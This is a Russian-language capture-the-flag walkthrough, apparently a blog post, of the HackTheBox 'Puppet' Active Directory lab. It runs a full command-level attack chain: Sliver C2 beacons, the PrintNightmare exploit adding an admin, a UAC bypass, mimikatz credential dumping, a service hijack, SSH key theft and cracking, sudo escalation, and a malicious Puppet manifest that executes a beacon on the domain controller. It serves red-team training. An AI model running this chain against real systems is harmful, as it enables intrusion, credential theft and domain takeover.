|
Professor Seleznov
|
Про Puppet уже написано несколько прохождений и даже был снят стрим, поэтому я решил написать своё прохождение и устранить все ошибки с которыми я столкнулся. Вам поручено провести проверку на проникновение в компанию Puppet Inc. Компания не разрешает передачу данных за пределы внутренней сети, поэтому внутри компании был создан сервер управления и контроля (C2), и сотрудник запустил вредоносную программу для имитации успешной атаки с использованием методов социальной инженерии. Puppet — это небольшой сценарий Active Directory, в котором вы начинаете с уже работающего маяка Sliver C2 на внутренней системе. Он предназначен для отработки работы в рамках C2-инфраструктуры в современной, сложной гибридной среде. Puppet разработан для специалистов по тестированию на проникновение и «красных команд», ищущих быструю и сложную лабораторию с уже настроенной C2-инфраструктурой для отработки операций C2. Эта лаборатория «Оператор красной команды уровня I» познакомит игроков со следующими темами: - Перечисление - Перечисление и атаки на Active Directory - Эксплуатация инфраструктуры DevOps - Боковое перемещение - Локальное повышение привилегий - Ситуационная осведомленность - Операции C2 Puppet — это цепочка задач средней сложности на HTB, в которой вы используете фреймворк C2 Sliver для взлома небольшой среды AD. Вы начинаете с уже существующего маячка на файловом сервере, повышаете привилегии с помощью эксплоита print nightmare, а затем дампите учетные данные. Затем вы делаете боковое перемещение на систему Linux, которая выступает в роли сервера Puppet, по сути, управляя всей средой. Вы повышаете привилегии на сервере Puppet и используете это для горизонтального перемещения на контроллер домена, где снова извлекаете учетные данные, чтобы получить последний флаг. Начнём со сканирования портов на единственном доступном компьютере (представьте, что компания предоставляет вам внутренний компьютер для тестирования): Добавим наш айпи в файлик hosts. sudo nano /etc/hosts
 Проведем начальное сканирование выданного айпи masscan’ом. sudo masscan -p1-65535,U:1-65535 10.13.38.33 --rate=500 -e tun0 > puppet.ms У нас открыты 5 портов.
 Просканируем их nmap’ом. nmap -p21,22,8140,8443,31337 -sC -sV -oA nmap/puppet puppet.htb
 Помимо FTP и SSH, мы видим порты 8443 и 31337, которые встречаются довольно редко. Давайте сначала проверим FTP, так как Nmap говорит, что к нему разрешен анонимный доступ. Подключимся к 21 порту. ftp puppet.htb
 Посмотрим файлы и папки. ls
 У нас есть два файла, загрузим их себе на машину. get red_127.0.0.1.cfg get sliver-client_linux
 Посмотрим скачанные файлы. cat red_127.0.0.1.cfg Это конфиг для подключения к С2 серверу.
 file sliver-client_linux Сам клиент для С2 сервера.
 FTP-ресурс содержит конфигурацию Sliver, а также клиент Sliver для удобства. Эта компания уже настроила для вас C2-сервер, но не хочет предоставлять вам доступ к командной оболочке на сервере. Давайте попробуем подключиться. Проверив конфигурацию, мы видим, что по умолчанию подключение осуществляется к localhost. Но так как порт для подключения находится на удаленной машине, то сделаем переадресацию портов. sudo socat TCP-LISTEN:31337,reuseaddr,fork TCP:puppet.htb:31337
 Сделаем файл клиента исполняемым. chmod +x sliver-client_linux
 Импортируем конфиг для С2 сервера. ./sliver-client_linux import red_127.0.0.1.cfg
 Теперь запускаем сам клиент и подключаемся к серверу. ./sliver-client_linux
 Выполнение команды beacons показывает, что к этому серверу уже подключен маяк: beacons
 Теперь мы можем либо взаимодействовать с маяком, либо переключиться на более быструю интерактивную сессию. В этой лабораторной работе я буду работать с сессией, но отмечу, что в реальных боевых действиях работа с маяком обычно предпочтительнее для целей уклонения. Маяки находятся в режиме ожидания между выполнением команд, и большинство C2-фреймворков применяют обфускацию во время этих задержек. При переключении на интерактивную сессию задержки больше не происходят, поэтому этот компонент уклонения теряется. Будем использовать маячок fe2a6189. use fe2a6189
 Перейдем в интерактивный режим взаимодействия с маячком. interactive
 Нам открылась сессия — 9d4ae392. Переключимся на сессию 9d4ae392. use 9d4ae392
 Теперь можем выполнять команды в системе. Перейдем на рабочий стол Брюса Смита и заберет первый флаг. cd C:\\Users\\bruce.smith\\Desktop
 ls
 cat flag.txt
 Теперь перейдём к локальному перечислению. Прежде всего, просмотрев файловую систему, мы заметим, что Puppet установлен. cd c:\\programdata
 Посмотрим список файлов и папок. ls
 Видим, что есть Puppet и PuppetLabs. Puppet — это инструмент для управления конфигурацией, в некотором смысле похожий на нашу систему управления и контроля (C2). Это означает, что где-то находится сервер Puppet, который управляет машинами в нашей среде. Далее нам нужно узнать, в каком контексте мы работаем — чтобы это увидеть, мы запустим объектный файл маяка sa-whoami (bof): Установим пакет sa-whoami через armory. armory install sa-whoami
 Посмотрим, кем мы являемся в системе, группы и привилегии. sa-whoami
 Обратите внимание, что мы являемся пользователями домена из группы employees, но, похоже, не имеем никаких особых привилегий. Наш следующий шаг — сбор данных о среде AD с помощью Bloodhound. Для этого мы можем напрямую запустить сборку sharp-hound-4 из Sliver: Перейдем в папку temp. cd c:\\temp
 Устанавливаем инжестор. armory install sharp-hound-4
 Собираем с помощью инжестора данные. sharp-hound-4 -s -t 300 -- -c all,gpolocalgroup
 Обратите внимание, что результат сохраняется в виде ZIP-архива на целевом компьютере, но нам все равно придется его загрузить: Загружаем файл себе на ПК для анализа. download 20260524015235_BloodHound.zip
 Мы загружаем файлы в наш локальный экземпляр BloodHound, но не видим никаких особенно интересных путей.
 В качестве следующего шага мы запускаем sa-adcs-enum bof, чтобы перечислить все потенциальные экземпляры ADCS. Устанавливаем пакет sa-adcs-enum для работы с центром сертификации. armory install sa-adcs-enum
 Запускаем sa-adcs-enum.
 Однако центров сертификации нет. Кроме того, мы перечисляем открытые порты локальной машины с помощью еще одного boof: Установим бандл situational-awareness. Но у меня не установился и выкинул ошибку на этапе установке sa-req-query.
 Ничего особенно интересного не обнаруживается. В качестве следующего шага мы ищем локальные уязвимости повышения привилегий. Хороший скрипт PowerShell для этого — PrivescCheck от itm4n. Поскольку мы не можем напрямую получить доступ к машине злоумышленника с целевой машины, нам придется либо загрузить скрипт на целевую машину, либо разместить его на машине управления и контроля. В данном случае я выбираю способ загрузки: Загрузим локально на kali чекер привилегий. wget https://github.com/itm4n/PrivescCheck/releases/down...PrivescCheck.ps1
 Теперь загружаем с kali на сервер этот чекер.
 Смотрим файлы. ls
 Установим sharpsh. armory install sharpsh
 Проверяем систему на локальные уязвимости. sharpsh -t 300 -- -c invoke-privesccheck -u c:\\temp\\PrivescCheck.ps1
 Машина уязвима для PrintNightmare из-за неправильной конфигурации! Существует множество способов эксплуатации этой уязвимости, для простоты я воспользуюсь PoC из этого репозитория - https://github.com/JohnHammond/CVE-2021-34527. PrintNightmare, по сути, загружает DLL-файл, контролируемый злоумышленником, как SYSTEM, поэтому вы также можете создать свой собственный DLL-файл для прямой загрузки маяка Sliver. Однако PoC от Джона Хаммонда позволяет использовать предварительно скомпилированный DLL-файл для добавления нового пользователя-администратора. Хотя это легко обнаружить, это быстрый способ добиться желаемого. Загрузим на kali эксплоит. git clone https://github.com/JohnHammond/CVE-2021-34527
 Перекинем его в рабочую папку. cp CVE-2021-34527.ps1 ~
 Перенесем эксплоит на машину. upload CVE-2021-34527.ps1
 Переключимся в шелл и загрузим скрипт CVE-2021-34527.ps1. Import-Module -Name C:\Temp\CVE-2021-34527.ps1
 Запустим эксплоит. Invoke-Nightmare -DriverName "PrintMe" -NewUser "john" -NewPassword "RedPuppet123"
 Проверим работу эксплоита. net localgroup administrators
 Поскольку мы добавили локального пользователя, входящего в группу администраторов, теперь мы можем использовать команду runas для переключения в его контекст, повторно запустив начальную полезную нагрузку маяка: exit Здесь нужно подождать.
 runas -u john -P "RedPuppet123" -p c:\\programdata\\puppet\\puppet-update.exe
 Посмотрим список маячков. beacons
 У нас появился новый маячок с именем <err> потому что мешает UAC. Смотрим кто мы. sa-whoami
 Давайте обойдем UAC. Клонируем репозиторий с обходом UAC. git clone https://github.com/icyguider/UAC-BOF-Bonanza.git
 Скопируем файлы в папку extensions С2 сервера. sudo cp -rp /home/kali/UAC-BOF-Bonanza /home/kali/.sliver-client/extensions/
 Перейдем в нужную папку для компиляции cd /home/kali/.sliver-client/extensions/UAC-BOF-Bonanza/
 Установим компилятор sudo apt install gcc-mingw-w64-bootstrap -y
 Исправляем ошибки. sed -i 's/^\(\s*\)return;$/\1return 0;/' EditionUpgradeManager/src/EditionUpgradeManagerBOF.c sed -i 's/\(CoGetObject.*&IID_IEditionUpgradeManager,\s*\)&Manager)/\1(void**)\\\&Manager)/' EditionUpgradeManager/src/EditionUpgradeManagerBOF.c sed -i 's/&IID_IEditionUpgradeManager, &Manager)/\&IID_IEditionUpgradeManager, (void**)\\\&Manager)/' EditionUpgradeManager/src/EditionUpgradeManagerBOF.c Компилируем. make
 Загружаем расширение. extensions load /home/kali/.sliver-client/extensions/UAC-BOF-Bonanza/SspiUacBypass
 Создаем нужную папку mkdir -p /home/kali/.sliver-client/extensions/SspiUacBypass/bin/ И копируем нужный файл куда нужно. cp /home/kali/.sliver-client/extensions/UAC-BOF-Bonanza/SspiUacBypass/bin/SspiUacBypassBOF.o /home/kali/.sliver-client/extensions/SspiUacBypass/bin/SspiUacBypassBOF.o И повышаемся до системы SspiUacBypass C:\\programdata\\puppet\\puppet-update.exe
 Смотрим маячки. beacons
 Всё как и раньше. use 0513a440 interactive use 879a55d8
 Забираем флаг с рабочего стола Администратора.
 Скопируем мимикатз в домашнюю директорию cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
 Воспользуемся боковым загрузчиком, чтобы загрузить мимикатз в память.
 Помимо хешей пользователя Брюса и самой машины, мы также получаем хеш нового пользователя: svc_puppet_win_t1. Вероятно, это учетная запись, которую Puppet использует для выполнения команд на серверах Windows первого уровня. Согласно собранным нами данным Active Directory, существуют также учетные записи svc_puppet_win_t0 и svc_puppet_lin_t1. Один аспект, который мы еще не рассматривали, — это общие ресурсы домена. Поэтому давайте сначала сделаем это из системной учетной записи (которая также является обычным пользователем домена — учетной записью машины сервера):

 Поставим расширение для работы с шарами sa-netshares. armory install sa-netshares
 Смотрим шары на домен контроллере. sa-netshares dc01

 sa-netshares file01 К нестандартным общим ресурсам относятся «FILES» на файловом сервере file01, где мы уже являемся администраторами, и общий ресурс IT на контроллере домена. Давайте проверим, можем ли мы получить доступ к общему ресурсу IT: ls \\\\dc01.puppet.vl\\it
 У нас нет доступа к этому разделу. Давайте проверим нового пользователя, которого мы получили ранее. Это пользователь, запускающий службу Puppet, поэтому, не прибегая к механизму pass-the-hash, мы можем изменить конфигурацию службы для получения маяка, а затем вернуть всё обратно. Давайте сначала перечислим службы: armory install sa-sc-enum
 Смотрим все службы. sa-sc-enum
 Посмотрим службу puppet на file01. armory install sa-sc-query
 sa-sc-query file01 puppet
 Установим расширение для работы с реестром armory install sa-reg-query
 К сожалению из-за этого расширения клиента выкидывает. Теперь мы могли бы изменить путь запуска и перезапустить службу, но есть способ и получше. execute -o -s -- c:\\windows\\system32\\cmd.exe /c sc config puppet binPath=c:\\programdata\\puppet\\puppet-update.exe
 Запускаем службу. execute -o -s -- c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -c "Restart-Service -Name puppet"
 Теперь у нас есть новый маячок.
 Но он быстро умирает, потому что мы загружаем файл маяка вместо службы, поэтому будем мигрировать в процесс. Для начала посмотрим список процессов. ps
 И мигрируем в нужный нам процесс. migrate -p 3140
 Теперь смотрим кто мы. whoami
 С помощью нового маяка svc_puppet_win_t1 мы теперь можем вывести список общих ресурсов на контроллере домена, поскольку у этой учетной записи есть права доступа к ним. Теперь мы можем убедиться, что у нас действительно есть доступ, и немного осмотреться. ls \\\\dc01.puppet.vl\\it ls \\\\dc01.puppet.vl\\it\\.ssh
 Загружаем себе эти ключи. download \\\\dc01.puppet.vl\\it\\.ssh\\ed25519 download \\\\dc01.puppet.vl\\it\\.ssh\\ed25519.pub
 Загружаем пингалку https://gist.github.com/joegasper/93ff8ae44fa8712747d85aa92c2b4c78 Находим такие айпи. Get-PingSweep -SubNet '172.16.40'
 Проверим порты. Test-NetConnection -ComputerName 172.16.40.5 -Port 22 Test-NetConnection -ComputerName 172.16.40.200 -Port 22
 Из содержимого файлов мы узнаем, что это закрытый ключ SSH для учетной записи svc_puppet_lin_t1@puppet.vl (обратите внимание, что вам, возможно, придется изменить символы конца строки, поскольку этот ключ был получен с машины под управлением Windows). Хотя Sliver имеет функциональность для выполнения команд SSH с помощью маяка, мне не удалось заставить его работать. Поэтому мы собираемся настроить переадресацию портов для SSH с нашей машины злоумышленника. Теперь сделаем саму переадресацию портов в С2. portfwd add --bind 2222 -r 172.16.40.200:22
 Не забываем переименовать файлы. mv '\\dc01.puppet.vl\it\.ssh\ed25519' ed25519 mv '\\dc01.puppet.vl\it\.ssh\ed25519.pub' ed25519.pub
 Преобразуем ключ в хеш для подбора пароля. ssh2john ed25519 > hash.txt
 Теперь подберем пароль. john hash.txt --wordlist=rockyou.txt К сожалению площадка Хабры не даёт больше загрузить изображения, поэтому дальше пойдет только текст. Меняем права на файл и преобразуем в нужный формат. chmod 0600 ed25519 dos2unix ed25519 Подключаемся к системе и вводим пароль. ssh -i ed25519 -t 'svc_puppet_lin_t1@puppet.vl'@127.0.0.1 -p 2222 Это сработало, и теперь у нас есть доступ к главному компьютеру Puppet Master. Посмотрим привилегии. sudo -l Перечислим машины, управляемые этой машиной посредством puppet: sudo puppet cert list --all Проведем повышение привилегий по инструкции https://gtfobins.org/gtfobins/puppet/ /bin/bash -p Читаем флаг в домашней директории у рута. Мы видим, что и file01, и контроллер домена управляются этим экземпляром Puppet Master. Хотя мы не знаем, под какими учетными записями работают агенты (кроме file01), можно предположить, что это, вероятно, svc_puppet_win_t0 для контроллера домена. Давайте найдем способ выполнить там команду: Создаем нужные папки. mkdir -p /etc/puppet/code/environments/production/manifests Меняем права на папку. chmod 777 /etc/puppet/code/environments/production/manifests Создаем следующий файл. nano /etc/puppet/code/environments/production/manifests/site.pp node 'dc01.puppet.vl' { exec { 'pwned': command => 'C:\\Windows\\System32\\cmd.exe /c \\\\file01.puppet.vl\\files\\puppet-update.exe', logoutput => true, } } node default { notify { 'This is the default node': } } Меняем права на файл chmod 777 /etc/puppet/code/environments/production/manifests/site.pp Применяем конфиг, не забывая положить файл в нужную папку. Задача агента — отследить изменения. По умолчанию это происходит каждые 30 минут, но здесь агент проверяет состояние системы каждую минуту, чтобы помочь в эксплуатации уязвимости. Вскоре после этого мы получаем сигнал от домена контроллера: Переключаемся на нужный маячок и заходим на рабочий стол Администратора. Это предоставляет полные административные права на контроллере домена, однако последний флаг находится не в обычном месте — на этой машине это пароль одного из пользователей. Поэтому нам придётся получить его из дампа учётных данных, т.е. последний флаг можно выгрузить с помощью SharpDPAPI.exe wget https://raw.githubusercontent.com/r3motecontrol/Gho...r/SharpDPAPI.exe Загружаем SharpDPAPI.exe, переходим в шелл и запускаем. upload SharpDPAPI.exe Машина пройдена, можно забирать сертификат. Полную PDF версию прохождения со всеми картинками можно забрать у меня в телегамм канале.-Источник
|